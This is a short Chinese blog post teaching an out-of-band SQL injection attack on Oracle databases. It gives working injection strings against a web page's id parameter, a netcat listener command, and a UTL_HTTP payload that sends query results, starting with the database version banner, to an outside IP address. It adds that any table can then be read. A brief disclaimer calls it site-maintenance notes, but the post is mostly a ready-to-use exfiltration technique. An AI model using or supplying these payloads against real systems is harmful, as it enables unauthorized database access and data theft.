首页
JAVA笔记
数据库笔记
混乱记忆
小站记
您现在的位置
SQL 注入 之 oracle
简介: 成功找到注入点,确定是 oracle 后 union 不能爆字段,反向请求走捷径。

是不是遇到 oracle 后经常暴不了字段?

是不是感觉到力不从心?

使用UTL_HTTP模块走捷径!

 

注入点示例:

  1. 要判断一下UTL_HTTP包是否存在
    http://www.xiaoyunduo.org/article?id=15 and (select count(*) from all_objects where object_name='UTL_HTTP')>0--如果显示正常则该模块可用
  2. 搭建一个http server 或者 使用 NC 监听谋端口
    nv -vv -l -p 12345
  3. 进行方向请求是把数据提交到http server
    http://www.xiaoyunduo.org/article?id=15 and UTL_HTTP.request('http://123.123.123.123:12345/'||(select banner from sys.v_$version where rownum=1))=1--执行成功后会有一个http请求,请求过来,数据在URL中。
  4. 不多说了,上面都可以任意查表了。
  5. 本文只为提高个人网站维护水平而记录,任何人使用该方法进行非法操作而产生的后果自行承当所有责任。

 

最近更新